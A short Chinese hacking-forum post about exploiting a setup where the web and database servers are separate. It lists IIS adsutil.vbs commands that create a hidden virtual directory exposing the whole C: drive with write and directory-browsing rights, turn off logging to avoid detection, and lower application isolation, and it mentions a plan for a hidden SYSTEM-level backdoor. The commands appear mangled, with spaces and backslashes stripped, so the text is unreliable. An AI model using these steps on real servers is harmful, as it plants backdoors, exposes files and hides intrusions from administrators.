以下是丑要饭的<web数据分离>

web和数据分离,有Pcanywhere,数据库服务器有IIS,

cscript.exec:inetpubadminscriptsadsutil.vbsgetw3svc/1/serverbindings得到第一个Web服务的端口

cscript.exec:inetpubadminscriptsadsutil.vbscreatew3svc/1/root/wodexi/IisWebVirtualDir创建一个虚拟目录wodexi

cscript.exec:inetpubadminscriptsadsutil.vbssetw3svc/1/root/wodexi/pathc:设置路径

cscript.exec:inetpubadminscriptsadsutil.vbssetw3svc/1/root/wodexi/accesswrite1设置写权限

cscript.exec:inetpubadminscriptsadsutil.vbssetw3svc/1/root/wodexi/accessread1设置读权限

cscript.exec:inetpubadminscriptsadsutil.vbssetw3svc/1/root/wodexi/enabledirbrowsing1可列目录权限

cscript.exec:inetpubadminscriptsadsutil.vbsstart_serverw3svc/1启动1号Web服务

在IE网址上写http://IP/wodexi/呵呵出现了目录！

我补充了下:

cscript.exec:inetpubadminscriptsadsutil.vbssetw3svc/1/root/wodexi/DontLog1不设置日志

本来是打算写个BAT建立2K下的具有system权限的隐藏虚拟后门的,不过在测试的时候发现CMD下建立的虚拟目录和Internet信息服务里建立虚拟目录不同,建立的虚拟目录没法执行ADMIN命令.

有兴趣的朋友可以自己测试:

cscript.exec:inetpubadminscriptsadsutil.vbssetw3svc/1/root/wodexi/AppIsolated0修改虚拟目录wodexi的应用程序保护为"低"AppIsolated还有另外2个参数1：保护为“中”2：保护为“高”